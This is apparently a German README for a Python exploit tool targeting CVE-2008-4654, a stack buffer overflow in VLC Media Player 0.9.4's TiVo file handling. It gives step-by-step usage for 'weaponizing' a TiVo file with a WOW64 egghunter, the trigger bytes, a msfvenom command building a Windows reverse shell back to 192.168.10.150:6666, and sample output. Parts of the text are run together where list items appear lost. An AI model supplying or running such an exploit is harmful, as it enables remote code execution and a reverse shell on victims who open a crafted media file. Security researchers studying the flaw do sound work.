
Ein voll funktionsfähiger Exploit für eine Stack-basierte Pufferüberlauf-Schwachstelle in VideoLan’s VLC Media Player 0.9.4 bei der Verarbeitung von TiVo-Dateien.
Ein voll funktionsfähiger Exploit für die stackbasierte Pufferüberlauf-Schwachstelle CVE-2008-4654 im VLC Media Player 0.9.4 von VideoLan bei der Verarbeitung von TiVo-Dateien. Er zielt auf eine 32-Bit-Binärdatei ab, die unter einem 64-Bit-Windows-System läuft, und verwendet einen WOW64-Egghunter, um den begrenzten Stack-Speicher zu umgehen.
Aktualisieren Sie das Skript:
buf = b'[...]' im Skript durch Ihren eigenen Shellcode (z. B. von msfvenom).EGG_HUNTER_WOW64-Shellcode an, falls Sie ein anderes Tag wünschen oder einen benutzerdefinierten Egghunter haben.python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
Transform a given TiVo file into a weapon with predefined shellcode.
options:
-h, --help show this help message and exit
--input INPUT Path to the input TiVo file to be weaponized.
--output OUTPUT Path where the modified (weaponized) TiVo file will be saved.
TIVO_PES_FILEID) in der TiVo-Datei.b"\x00\x00\x00\xff", was den Out-of-Bounds-Read auslöst, der zu einem Stack-Überlauf führt.TIVO_PES_FILEID) mit einer benutzerdefinierten Nutzlast.w00tw00t durchsucht.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]' durch den zuvor erstellten Shellcode.PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty